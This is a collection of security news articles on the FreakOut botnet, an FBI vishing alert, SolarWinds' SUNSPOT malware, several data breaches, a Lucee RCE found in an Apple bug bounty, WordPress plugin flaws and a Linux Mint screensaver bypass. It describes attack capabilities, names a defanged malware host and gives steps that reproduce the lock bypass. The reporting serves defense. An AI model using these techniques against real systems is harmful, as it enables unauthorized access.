Security researchers uncovered a series of attacks conducted by the FreakOut botnet that leveraged recently discovered vulnerabilities.

Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that is targeting multiple unpatched flaws in applications running on top of Linux systems.

The botnet appeared in the threat landscape in November 2020, in some cases the attacks leveraged recently disclosed vulnerabilities to inject OS commands. The attacks aimed at compromising the tarted systems to create an IRC botnet, which can later be used to conduct several malicious activities, including DDoS attacks and crypto-mining campaign.

The attacks observed by Check Point aimed at devices that run one of the following products:

  • TerraMaster TOS(TerraMaster Operating System) – the operating system used for managing TerraMaster NAS (Network Attached Storage) servers
  • Zend Framework –  a collection of packages used in building web application and services using PHP, with more than 570 million installations
  • Liferay Portal – a free, open-source enterprise portal. It is a web application platform written in Java that offers features relevant for the development of portals and websites

Once infected a device, it will be later used as an attacking platform.

FreakOut botnet

Botnet operators are scanning the internet for vulnerable applications affected by one of the recently disclosed vulnerabilities and take over the underlying Linux system:

  • CVE-2020-28188 – RCE flaw that resides in the TerraMaster management panel (disclosed on December 24, 2020) – This flaw could be exploited by a remote unauthenticated attacker to inject OS commands, and gain control of the servers using TerraMaster TOS (versions prior to  4.2.06).
  • CVE-2021-3007 – deserialization flaw that affects the Zend Framework (disclosed on January 3, 2021). The flaw affects Zend Framework versions higher than 3.0.0, the attacker can abuse the Zend3 feature that loads classes from objects to upload and execute malicious code in the server. The code can be uploaded using the “callback” parameter, which in this case inserts a malicious code instead of the “callbackOptions” array.
  • CVE-2020-7961 – Java unmarshalling flaw via JSONWS in Liferay Portal (in versions prior to 7.2.1 CE GA2) (disclosed on March 20, 2020). An attacker can exploit the flaw to provide a malicious object, that when unmarshalled, allows remote code execution.

“In all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to download and execute a Python script named “”.” reads the analysis published by Check Point. “After the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2. Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”

The bot is an obfuscated Python script downloaded from the site https://gxbrowser[.]net consisting of polymorphic code.

The FreakOut botnet has a modular structure, it uses a specific function for each capability it supports. Below a list of functions implemented in the botnet:

  • Port Scanning utility
  • Collecting system fingerprint
    • Includes the device address (MAC, IP), and memory information. These are used in different functions of the code for different checks
    • TerraMaster TOS version of the system
  • Creating and sending packets
    • ARP poisoning for Man-in-the-Middle attacks.
    • Supports UDP and TCP packets, but also application layer protocols such as HTTP, DNS, SSDP, and SNMP
    • Protocol packing support created by the attacker.
  • Brute Force – using hard coded credentials 
    • With this list, the malware tries connecting to other network devices using Telnet. The function receives an IP range and tries to brute force each IP with the given credential. If it succeeds, the results of the correct credential are saved to a file, and sent in a message to the C2 server
  • Handling sockets
    • Includes handling exceptions of runtime errors.
    • Supports multi-threaded communication to other devices. This allows simultaneous actions the bots can perform while listening to the server
  • Sniffing the network
    • Executes using the “ARP poisoning” capability. The bot sets itself as a Man-in-the-Middle to other devices. The intercepted data is sent to the C2 server
  • Spreading to different devices, using the “exploit” function.
    • Randomly generates the IPs to attack
    • Exploits the CVEs mentioned above (CVE-2020-7961 , CVE-2020-28188, CVE-2021-3007)
  • Gaining persistence by adding itself to the rc.local configuration.
  • DDOS and Flooding – HTTP, DNS, SYN
    • Self-implementation of Slowlaris. The malware creates many sockets to a relevant victim address for the purpose of instigating a DDoS attack
  • Opening a reverse-shell – shell on the client
  • Killing a process by name or ID
  • Packing and unpacking the code using obfuscation techniques to provide random names to the different functions and variables.

The botnet could conduct multiple malicious activities by combining the above functions, such as delivering a cryptocurrency miners, launching DDoS, ot spreading laterally across the company network.

Check Point researchers analyzed the malicious code and were able to access the IRC channel used by the botmaster to control the botnet.

The botnet is in an early stage, at the time of the analysis, the IRC panel shows it was controlling only 188 bots.

Check Point experts were also able to track its author, who goes online with the moniker Freak.

“To identify the threat actors responsible for the attacks, we searched for leads in the internet and social media.  Searching for both the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels) and the IRC bot name “N3Cr0m0rPh”, revealed information about the threat actor behind the campaign.” continues the analysis.

“In a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic IRC BOT”, the bot is offered for sale in exchange for BitCoins (BTC).”

The analysis published by the experts includes the MITRE ATT&CK TECHNIQUES and protections (IoCs, IPS, and Anti-Bot).

Pierluigi Paganini

(SecurityAffairs – hacking, FreakOut botnet)

The post FreakOut botnet target 3 recent flaws to compromise Linux devices appeared first on Security Affairs.

Vishing attacks conducted to steal corporate accounts, FBI warns

The Federal Bureau of Investigation (FBI) has issued a notification warning of ongoing vishing attacks attempting to steal corporate accounts.

The Federal Bureau of Investigation (FBI) published a Private Industry Notification (PIN) that warns of ongoing vishing attacks aimed at stealing corporate accounts and credentials from US and international-based employees.

Vishing (also known as voice phishing) is a social engineering attack technique where attackers impersonate a trusted entity during a voice call in an attempt to trick victims into providing sensitive information.

The alert highlights that during the COVID-19 pandemic, organizations are more exposed to these attacks because had quickly changed their working processes to maintain the social distancing. As a result, network access and privilege escalation may not be fully monitored.

The threat actors are using Voice over Internet Protocol (VoIP) platforms to obtain employees’ credentials.

“Cyber criminals are trying to obtain all employees’ credentials, not justindividuals who would likely have more access based on their corporate position.” reads the FBI alert. “The cyber criminals vished these employees through the use of VoIP platforms.”

Once gained access to the network, crooks expand their network access, for example, escalating privileges of the compromised employees’ accounts.

The alert reports the case of an attack in which cyber criminals found an employee via the company’s chatroom, and tricked him into logging into the fake VPN page. Then attackers used these credentials to log into the company’s VPN and performed reconnaissance to find employees with higher privileges who could perform username and e-mail changes and found an employee through a cloud-based payroll service. Then the attackers used a chatroom messaging service to conduct a phishing attack against this employee

Below the mitigations recommended by the FBI:

  • Implement multi-factor authentication (MFA) for accessing employees’ accounts in order to minimize the chances of an initial compromise.
  • When new employees are hired, network access should be granted on a least privilege scale. Periodic review of this network access for all employees can significantly reduce the risk of compromise of vulnerable and/or weak spots within the network.
  • Actively scanning and monitoring for unauthorized access or modifications can help detect a possible compromise in order to prevent or minimize the loss of data.
  • Network segmentation should be implemented to break up one large network into multiple smaller networks which allows administrators to control the flow of network traffic.
  • Administrators should be issued two accounts: one account with admin privileges to make system changes and the other account used for email, deploying updates, and generating reports.

In August, The FBI and CISA issued a joint alert to warn teleworkers of an ongoing vishing campaign targeting entities from multiple US sectors.

This is the second warning alerting of active vishing attacks targeting employees issued by the FBI since the start of the pandemic after an increasing number of them have become teleworkers.

In August 2020, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory warning remote workers of an ongoing vishing campaign targeting companies from several US industry sectors.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, vishing)

The post Vishing attacks conducted to steal corporate accounts, FBI warns appeared first on Security Affairs.

Injecting a Backdoor into SolarWinds Orion

Crowdstrike is reporting on a sophisticated piece of malware that was able to inject malware into the SolarWinds build process:

Key Points

  • SUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.
  • SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code.
  • Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary’s presence.

Analysis of a SolarWinds software build server provided insights into how the process was hijacked by StellarParticle in order to insert SUNBURST into the update packages. The design of SUNSPOT suggests StellarParticle developers invested a lot of effort to ensure the code was properly inserted and remained undetected, and prioritized operational security to avoid revealing their presence in the build environment to SolarWinds developers.

This, of course, reminds many of us of Ken Thompson’s thought experiment from his 1984 Turing Award lecture, “Reflections on Trusting Trust.” In that talk, he suggested that a malicious C compiler might add a backdoor into programs it compiles.

The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well-installed microcode bug will be almost impossible to detect.

That’s all still true today.

How to defend against today’s top 5 cyber threats

Cyber threats are constantly evolving. As recently as 2016, Trojan malware accounted for nearly 50% of all breaches. Today, they are responsible for less than seven percent. That’s not to say that Trojans are any less harmful. According to the 2020 Verizon Data Breach Investigations Report (DBIR), their backdoor and remote-control capabilities are still used by advanced threat actors to conduct sophisticated attacks. Staying ahead of evolving threats is a challenge that keeps many IT … More

The post How to defend against today’s top 5 cyber threats appeared first on Help Net Security.

OpenWRT forum hacked, intruders stole user data

The OpenWRT forum, the community behind the open-source project for embedded operating systems based on Linux, disclosed a data breach.

OpenWrt is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic. The main components are Linux, util-linux, musl, and BusyBox. All components have been optimized to be small enough to fit into the limited storage and memory available in home routers.

OpenWRT forum was compromised during the weekend and user data were stolen by intruders.

The administrators of the forum disclosed the data breach with an announcement published on the forum.

The attack took place on Saturday, around 04:00 (GMT), when threat actors compromised an administrator account and downloaded a copy of the list of users.

“Around 0400 GMT on 16 Jan 2021, an administrator account on the OpenWrt forum ( was breached. It is not known how the account was accessed: the account had a good password, but did not have two-factor authentication enabled.” states the data breach notification published by the administrators of the forum. “The intruder was able to download a copy of the user list that contains email addresses, handles, and other statistical information about the users of the forum. Although we do not believe the intruder could download the database, from an abundance of caution, we are following the advice of the Discourse community and have reset all passwords on the Forum, and flushed any API keys.”

The list contains email addresses, handles, and other statistical information about the users of the forum. According to the announcement, the compromised account was using a “a good password,” but it was not using two-factor authentication (2FA).

Administrators do not believe the attackers have downloaded the database of the forum containing users’ credentials.

However, with an abundance of caution, forum administrators reset all passwords and flushed any API keys.

Users have to reset their password manually on
and following the “get a new password” instructions. If users use Github login/OAuth key, they should reset/refresh it.

The notice states that OpenWrt forum credentials are separate from OpenWrt Wiki (, this means that the data breach did not compromise Wiki credentials.

OpenWRT administrators warn of phishing attempts against forum users.

“You should assume that your email address and handle have been disclosed. That means you may get phishing emails that include your name. DO NOT click links, but instead manually type the URL of the forum as above.” states the advisory.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post OpenWRT forum hacked, intruders stole user data appeared first on Security Affairs.

500K+ records of C-level people from Capital Economics leaked online

Experts from Cyble recently found a leak of 500K+ records of C-level people from Capital Economics on a Russian-speaking forum.

During a routine Darkweb monitoring, researchers from Cyble found a leak of 500K+ records of C-level people from Capital Economics on a Russian-speaking forum. is one of the leading independent economic research companies in the world that provides macroeconomic, financial market and sectoral forecasts and consultancy.


“Upon analysis of the data, Cyble discovered that there are 500K+ lines of record containing various prominent user profiles.” reads the post published by Cyble.

Leaked records include email IDs, password hashes, addresses, etc.  

Cyble experts informed its clients about this leak, it pointed out that the availability of corporate email IDs could allow threat actors to carry out a broad range of malicious activities.

Cyble recommends people to: 

  • Never share personal information, including financial information over phone, email or SMSes. 
  • Use strong passwords and enforce multi-factor authentication wherever possible. 
  • Regularly monitor your financial transactions, and if you notice any suspicious activity, contact your bank immediately. 
  • Turn on the automatic software update feature on your computer, mobile and other connected devices wherever possible and pragmatic. 
  • Use a reputed anti-virus and Internet security software package on your connected devices including PC, laptop, and mobile. 
  • People who are concerned about their exposure in the Darkweb can register at to ascertain their exposure. 
  • Refrain from opening untrusted links and email attachments without verifying their authenticity.  

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Capital Economics)

The post 500K+ records of C-level people from Capital Economics leaked online appeared first on Security Affairs.

Apple paid a $50,000 bounty to two bug bounty hunters for hacking its hosts

A duo of white hat hackers claims to have earned $50,000 from Apple for reporting serious flaws that allowed them to company’s servers.

The Indian white hat hackers Harsh Jaiswal and Rahul Maini claim to have discovered multiple flaws that allowed them to access Apple servers.

The duo started focusing on Apple’s infrastructure in an attempt to emulate the success of a team of researchers composed of Sam Curry, Brett Buerhaus, Ben Sadeghipour, Samuel Erb and Tanner Barnes that reported a total of 55 flaws to Apple in October as part of the company bug bounty program and received for these issues 32 payrolls for a total of $288,500.

The two experts focus on critical findings such as PII exposure or getting access to Apple’s servers or internal network.

While conducting reconnaissance and fingerprinting the experts found three Apple hosts running a content management system (CMS) backed by Lucee, which is a dynamic, Java-based, tag and scripting language used for rapid web application development. The three hosts are:

apple bug bounty 2

The hosts were exposing the Lucee admin panel, two of them were running an outdated version. The hosts with the outdated version were exposing travel portals implemented by Apple to its employees.

Even if the outdated versions were affected by security flaws, the experts pointed out that Apple was using WAF to mitigate the attacks against its applications.

The security duo discovered a misconfiguration in Lucee that could be exploited to access files without being authenticated, opening the door to the creation of a webshell on Apple servers and execute arbitrary code.

“While testing out Lucee locally, we came across a critical misconfiguration which allowed an attacker to access authenticated CFM (ColdFusion) files directly. This allowed us to perform a lot of authenticated actions while being completely unauthenticated. As soon as you hit the request.admintype variable/property in a CFM file, the execution flow will stop as we’re not authenticated as admin. However, any code before that check executes.” reads the post published by the bug bounty hackers. “So we had to find files that had some sort of bug before they hit request.admintype. We made use of these three files to gain a complete pre-auth/unauth RCE on a Lucee installation:

  • imgProcess.cfm (not available in older versions)
  • ext.applications.upload.cfm”

The experts provided technical details of their activity, they explained how they avoided triggering Apple’s web application firewall and got a shell on the 2 hosts.

Jaiswal and Maini shared their findings with Apple that awarded them a $50,000 bug bounty. The IT giant promptly addressed the issue, but requested the experts to not disclose the flaw before they make some other changes.

The development team behind Lucee also fixed the bug by restricting access to cfm files directly, here’s the commit link.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)

The post Apple paid a $50,000 bounty to two bug bounty hunters for hacking its hosts appeared first on Security Affairs.

Rob Joyce is the new NSA Cyber Director

The U.S. National Security Agency has appointed Rob Joyce as the agency’s new director of cybersecurity, who has long experience in US cybersecurity

The National Security Agency (NSA) has appointed US cybersecurity official Rob Joyce as the new chief of the Cybersecurity Directorate. Joyce served as the NSA’s top representative in the UK since 2018, he is the successor of Anne Neuberger, who recently appointed Deputy National Security Advisor for Cyber and Emerging Technology for the National Security Council (NSC). Neuberger was the director of the directorate since its creation in 2019.

Joyce also served as senior advisor to the NSA director on cybersecurity strategy.

Joyce has previously held other roles at the NSA, including chief of Tailored Access Operations (TAO), now Computer Network Operations, which is a cyber-warfare intelligence-gathering unit of the National Security Agency (NSA).

Rob Joyce also served as deputy director of the Information Assurance Directorate (IAD).

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, NSA)

The post Rob Joyce is the new NSA Cyber Director appeared first on Security Affairs.

German laptop retailer fined €10.4m under GDPR for video-monitoring employees

German data regulator LfD announced a €10.4M fine under GDPR against the online laptop and electronic goods retailer NBB for video-monitoring employees.

The State Commissioner for Data Protection (LfD) Lower Saxony announced a €10.4 million fine under the GDPR against an online laptop and electronic goods retailer NBB’s ( for video-monitoring employees for at least a couple of years. This fine is the highest the German authority has set so far.

“The State Commissioner for Data Protection (LfD) Lower Saxony has imposed a fine of 10.4 million euros on AG.” states the LfD. “The company had video-monitored its employees for at least two years without any legal basis.” states the LfD.”The illegal cameras recorded workplaces, sales rooms, warehouses and common areas, among other things.”

“The State Commissioner for Data Protection (LfD) Lower Saxony said NBB’s ( constant surveillance was “inadmissible” under the General Data Protection Regulation (GDPR).” reported ComplianceWeek.

NBB was disappointed by the decision and defined the fine as “inadmissible,” it claimed that the video cameras were installed to prevent and investigate criminal offenses and to track the flow of goods in the warehouses. 

“The fine is completely disproportionate. It bears no relation to the size and financial strength of the company or to the seriousness of the alleged violation,” CEO Oliver Hellmold said (original statementtranslated statement), “We consider the decision to be unlawful and demand that it be repealed.”

The data regulator pointed out that to prevent theft, a company must first put in place minor measures, such as random bag checks. Video surveillance to uncover criminal offenses is only lawful if there is justified suspicion against certain employees. In any case, the companies can use the camera to monitor the suspects for a limited period of time. This is not the case of the NBB because the video surveillance was in place for a long time, and the recordings were saved for 60 days in many cases, which is significantly longer than necessary.

“We are dealing with a serious case of video surveillance in the company,” said Barbara Thiel, head for LfD Lower Saxony. “Companies must understand that with such intensive video surveillance they are massively violating the rights of their employees.”

The LfD remarks that permanent and intensive video surveillance violates the rights of the employee and put them under pressure.

“Customers of were also affected by the inadmissible video surveillance, as some cameras were aimed at seating in the sales area. In areas in which people typically stay longer, for example to extensively test the devices offered, those affected by data protection law have high interests worthy of protection.” continues the German data authority. “This is especially true for seating areas that are obviously intended to invite you to linger for a longer period of time. Therefore, the video surveillance by was not proportionate in these cases.”

The German privacy watchdog also fined the clothing retailer H&M €35.3 million because it was allegedly spying on its customer service representatives in Germany.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, GDPR)

The post German laptop retailer fined €10.4m under GDPR for video-monitoring employees appeared first on Security Affairs.

President Biden’s Peloton exercise equipment under scrutiny

President Joe Biden can’t bring his Peloton exercise equipment to the White House due to security reasons.

According to a Popular Mechanics report, President Joe Biden is going to move to the White House and likely he will have to give up his Peloton exercise equipment for security reasons.

Peloton exercise equipment’s popularity surged during the pandemic, it allows users to do gymnastic exercise from home, interacting with each other within an online community.


Peloton devices are connected online and are equipped with a camera and microphone that give the users an immersive experience and communications capabilities. On the other side, these features pose a potential risk to the user in case of a hack, and President Joe Biden is a privileged target.

To secure the exercise equipment, Biden’s Peloton may have to be modified, removing the microphone, camera and networking equipment.

“If you really want that Peloton to be secure, you yank out the camera, you yank out the microphone, and you yank out the networking equipment … and you basically have a boring bike,” Max Kilger, Ph.D., director of the Data Analytics Program and Associate Professor in Practice at the University of Texas at San Antonio, told Popular Mechanics. “You lose the shiny object and the attractiveness.”

The case has an important precedent, three years ago The Verge revealed that a person close to the company confirmed that Michelle Obama had a Peloton, but it was a modified model, without a camera or microphone.

Peloton runs a custom operating system built on top of Android’s own system and is equipped with networking equipment to access the user’s home WiFi network or a hard-wired connection, like Ethernet.

“That allows the bike to communicate with your Apple Watch or Fitbit, which are internet-of-things (IoT) devices that contain microphones. If a hacker found a way to infect Biden’s Peloton, then it’s theoretically possible they could hop from the bike to the watch and vice versa,” Kilger added.

Several hacking communities online focus on IoT devices, including the Peloton equipment. The risk is that someone could find a way to compromise the equipment with malware, then move laterally within the host network and compromise any other connected device.

The report pointed out that Secret Service can take precautions to secure the gym sessions of the President. They could set up the bike in a special gym area where it is not allowed to discuss classified topics. Another countermeasure is to use a hardwired connection for the President’s Peloton equipment that’s separate from the rest of the White House network.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Peloton)

The post President Biden’s Peloton exercise equipment under scrutiny appeared first on Security Affairs.

EMA said that hackers manipulated stolen documents before leaking them

The European Medicines Agency (EMA) revealed Friday that COVID-19 vaccine documents stolen from its servers have been manipulated before the leak.

The European Medicines Agency (EMA) declared that COVID-19 vaccine documents stolen from its servers in a recent cyber attack have been manipulated.

In December, a cyber attack hit the European Medicines Agency (EMA). At the time of the disclosure of the hack, the EMA did not provide technical details about the attack, nor whether it will have an impact on its operations while it is evaluating and approving COVID-19 vaccines.

European Medicines Agency

The European agency plays a crucial role in the evaluation of COVID-19 vaccines across the EU, it has access to sensitive and confidential information, including quality, safety, and effectivity data resulting from trials.

Nation-state actors consider organizations involved in the research of the vaccine a strategic target to gather intelligence on the ongoing response of the government to the pandemic. At the end of November, the Reuters agency revealed in an exclusive that the COVID vaccine maker AstraZeneca was targeted by alleged North Korea-linked hackers.

After the attack, Pfizer and BioNTech issued a joint statement that confirms that some documents related to their COVID-19 submissions were accessed by the threat actors.

Last week, the European Medicines Agency (EMA) revealed threat actors have stolen some of the Pfizer/BioNTech COVID-19 vaccine data and leaked it leaked online.

The agency added that the European medicines regulatory network is fully functional and that the cyber attack had no impact on COVID-19 evaluation and approval timelines.

The investigation conducted by the European Medicines Agency showed that threat actors manipulated emails and documents related to the evaluation of experimental COVID-19 vaccines before leaking them online.

The manipulation of the documents is part of a disinformation campaign aimed at raising doubts about the vaccine and the work of the EMA.

“Some of the correspondence has been manipulated by the perpetrators prior to publication in a way which could undermine trust in vaccines,” the Netherlands-based agency said.

“We have seen that some of the correspondence has been published not in its integrity and original form and, or with, comments or additions by the perpetrators.”

Multiple security firms, such as Cyble and Yarix, have found leaks on underground forums.

“During the assessment of data, our researchers noticed that multiple confidential files, including MoMs, assessment reports, confidential emails, login portal links and images of its internal pages were accessed and leaked.” reported the analysis published by Cyble.  

COVID-19 alleged EMA documents

The experts shared screenshots of the internal email where the portal link was shared, the login page for the portal to access the reports, and images of internal pages.

COVID-19 alleged EMA documents 2

The documents also include the alleged assessment report of COVID-19 vaccine along with the summary report of drug release and stability.

Law enforcement authorities are still investigating the security incident.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, EMA)

The post EMA said that hackers manipulated stolen documents before leaking them appeared first on Security Affairs.

Critical flaws in Orbit Fox WordPress plugin allows site takeover

Two vulnerabilities in the Orbit Fox WordPress plugin, a privilege-escalation issue and a stored XSS bug, can allow site takeover.

Security experts from Wordfence have discovered two security vulnerabilities in the Orbit Fox WordPress plugin. The flaws are a privilege-escalation vulnerability and a stored XSS bug that impacts over 40,000 installs.

The Orbit Fox plugin allows site administrators to add features such as registration forms and widgets, it has been installed by 400,000+ sites.

The plugin was developed by ThemeIsle, it is designed to enhance the Elementor, Beaver Builder, and Gutenberg editors and implements additional features 

Two vulnerabilities can be exploited by attackers to inject malicious code into websites using the vulnerable version of the plugin and take over them.

“One of these flaws made it possible for attackers with contributor level access or above to escalate their privileges to those of an administrator and potentially take over a WordPress site. The other flaw made it possible for attackers with contributor or author level access to inject potentially malicious JavaScript into posts.” reads the post published by Wordfence. “These types of malicious scripts can be used to redirect visitors to malvertising sites or create new administrative users, amongst many other actions.”

The authenticated privilege-escalation flaw has been rated as critical and has received a CVSS bug-severity score of 9.9. authenticated attackers with contributor level access or above can escalate privileges to administrator and potentially take over a website.

The authenticated stored cross-site scripting (XSS) issue allows attackers with contributor or author level access to inject JavaScript into posts. An attacker could exploit this flaw to conduct multiple malicious actions, such as malvertising attacks. The flaw rated as medium severity has received a CVSS score of 6.4.

Orbit Fox plugin includes a registration widget that can be used to create a registration form with customizable fields when using the Elementor and Beaver Builder page builder plugins. Upon creating the registration form, the plugin will provide the ability to set a default role to be used whenever a user registers using the form.

“Lower-level users like contributors, authors, and editors were not shown the option to set the default user role from the editor. However, we found that they could still modify the default user role by crafting a request with the appropriate parameter,” Wordfence continues. “The plugin provided client-side protection to prevent the role selector from being shown to lower-level users while adding a registration form. Unfortunately, there were no server-side protections or validation to verify that an authorized user was actually setting the default user role in a request.”

Experts pointed out that the lack of server-side validation in Orbit Fox allows lower-level users to set their role to that of an administrator upon successful registration.

“To exploit this flaw, user registration would need to be enabled and the site would need to be running the Elementor or Beaver Builder plugins,” continues Wordfence. “A site with user registration disabled or neither of these plugins installed would not be affected by this vulnerability.”

This vulnerability allowed lower-level users to add malicious JavaScript to posts that would execute in the browser whenever a user navigated to that page.

The two vulnerabilities have been addressed with the release of version 2.10.3.

Vulnerabilities in WordPress plugins are very dangerous and could allow attackers to carry out attacks on a large scale. On December, the development team behind the Contact Form 7 WordPress plugin discloses an unrestricted file upload vulnerability, the plugin has over 5 million active installs. The issue can exploit to upload a file that can be executed as a script file on the underlying server.

In November threat actors were observed actively exploiting a zero-day vulnerability in the popular Easy WP SMTP WordPress plugin installed on more than 500,000 sites.

In the same period hackers were actively exploiting a critical remote code execution vulnerability in the File Manager plugin, over 300,000 WordPress sites were potentially exposed at the time of the discovery.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Golang-based worm)

The post Critical flaws in Orbit Fox WordPress plugin allows site takeover appeared first on Security Affairs.

Security Affairs newsletter Round 297

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

It is time to re-evaluate Cyber-defence solutions
New Zealand central bank hit by a cyber attack
TeamTNT botnet now steals Docker API and AWS credentials
Connecting the dots between SolarWinds and Russia-linked Turla APT
Experts found gained access to the Git Repositories of the United Nations
Russian hacker Andrei Tyurin sentenced to 12 years in prison
Source code for malware that targets Qiui Cellmate device was leaked online
Ubiquiti discloses a data breach
Bitdefender releases free decrypter for Darkside ransomware
EMA: Some of Pfizer/BioNTech COVID-19 vaccine data was leaked online
Police took down DarkMarket, the worlds largest darknet marketplace
Sophisticated hacking campaign uses Windows and Android zero-days
Sunspot, the third malware involved in the SolarWinds supply chain attack
Attackers targeted Accellion FTA in New Zealand Central Bank attack
Data collection cheat sheet: how Parler, Twitter, Facebook, MeWes data policies compare
Rogue Android RAT emerges from the darkweb
CAPCOM: 390,000 people impacted in the recent ransomware Attack
CISA warns of recent successful cyberattacks against cloud service accounts
Cisco addresses a High-severity flaw in CMX Software
Classiscam expands to Europe: Russian-speaking scammers lure Europeans to pages mimicking classifieds
Expert discovered a DoS vulnerability in F5 BIG-IP systems
Operation Spalax, an ongoing malware campaign targeting Colombian entities
Cisco says its RV routers will no longer receive updates
Expert launched Malvuln, a project to report flaws in malware
Signal is down for multiple users worldwide
Winnti APT continues to target game developers in Russia and abroad
Jokers Stash, the largest carding site, is shutting down
Siemens fixed tens of flaws in Siemens Digital Industries Software products
Two kids found a screensaver bypass in Linux Mint

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 297 appeared first on Security Affairs.

Two kids found a screensaver bypass in Linux Mint

The development team behind the Linux Mint distro has fixed a security flaw that could have allowed users to bypass the OS screensaver.

The maintainers of the Linux Mint project have addressed a security bug that could have allowed attackers to bypass the OS screensaver.

The curious aspect of this vulnerability is related to its discovery, in fact, it was found by too children that were playing on their dad’s computer.

The process is simple and allow the screensaver lock by-pass by crashing the screensaver and unlock the desktop via the virtual keyboard.

In order to reproduce the bypass on a locked system, click on the virtual keyboard, then type at the real keyboard while typing on the virtual keyboard, both at the same time, as many keys as possible.

“A few weeks ago, my kids wanted to hack my linux desktop, so they typed and clicked everywhere, while I was standing behind them looking at them play… when the screensaver core dumped and they actually hacked their way in! wow, those little hackers…” states a bug report on GitHub.

“I thought it was a unique incident, but they managed to do it a second time. So I’d consider this issue… reproducible… by kids. I tried to recreate the crash on my own with no success, maybe because it required more than 4 little hands typing and using the mouse on the virtual keyboard. Maybe not the best bug report, but I’ve seen the screenlock crash twice already with my own eyes, so its pretty real. One last thing, after the desktop is unlocked, I can’t re-lock it again, the screensaver process is pretty dead and requires me to open a shell and run ‘cinnamon-screensaver’ manually to get it working.”

Linux Mint lead developer Clement Lefebvre confirmed that the bug resides in the libcaribou, the on-screen keyboard (OSK) component that is part of the Cinnamon desktop environment used by Linux Mint.

“We’ll most likely patch libcaribou here” wrote Lefebvre. “We have two different issues:

  • In all versions of Cinnamon, the on-screen keyboard (launched from the menu) runs within the Cinnamon process and uses libcaribou. Pressing ē crashes Cinnamon.
  • In versions of Cinnamon 4.2 and higher, there’s a libcaribou OSK in the screensaver. Pressing ē there crashes the screensaver.”

The vulnerability is triggered when users press the “ē” key on the on-screen keyboard, this causes the crash of the Cinnamon desktop process. If the on-screen keyboard is opened from the screensaver, the bug crashes the screensaver allowing users to access the desktop.

The issue was introduced in the Linux Mint OS since the Xorg update to fix CVE-2020-25712 heap-buffer overflow in October. The bug affects all distributions running Cinnamon 4.2+ and any software using libcaribou.

The vulnerability was addressed with the release of a patch for Mint 19.x, Mint 20.x and LMDE 4.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Linux Mint)

The post Two kids found a screensaver bypass in Linux Mint appeared first on Security Affairs.

Siemens fixed tens of flaws in Siemens Digital Industries Software products

Siemens has addressed tens of vulnerabilities in Siemens Digital Industries Software products that can allow arbitrary code execution.

Siemens has addressed 18 vulnerabilities affecting some products of Siemens Digital Industries Software which provides product lifecycle management (PLM) solutions.

The vulnerabilities affect Siemens JT2Go, a 3D viewing tool for JT data (ISO-standardized 3D data format) and the Teamcenter Visualization solution. JT2Go is a 3D JT viewing tool to allows its customers to view JT, PDF, Solid Edge, PLM XML with available JT, VFZ, CGM, and TIF data. Teamcenter Visualization software provides a comprehensive family of visualization solutions to access documents, 2D drawings and 3D models in a single environment.

“JT2Go and Teamcenter Visualization are affected by multiple vulnerabilities that could lead to arbitrary code execution or data extraction on the target host system. Siemens has released updates for both affected products and recommends to update to the latest versions.” states the advisory published by the vendor.

The company recommends limiting the opening of untrusted files in systems where JT2Go or Teamcenter Visualisation is installed to mitigate the risk of attacks exploiting these issues. It also suggests applying a Defense-in-Depth concept to reduce the probability that the untrusted code is run on the system.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also published an advisory related to these security flaws.

According to CISA, the addressed flaws include Type Confusion, Improper Restriction of XML External Entity Reference, Out-of-bounds Write, Heap-based Buffer Overflow, Stack-based Buffer Overflow, Untrusted Pointer Dereference, and Out-of-bounds Read.

The following products are affected by the vulnerabilities addressed by Siemens:

  • JT2Go: All versions prior to v13.1.0
  • JT2Go: Version 13.1.0. only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991
  • Teamcenter Visualization: All versions prior to V13.1.0
  • Teamcenter Visualization: Version 13.1.0 only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991

Several vulnerabilities addressed by the vendor received a CVSS v3 base score of 7.8, including:

The flaws were reported by two researchers through Trend Micro’s Zero Day Initiative (ZDI) and the U.S. CISA.

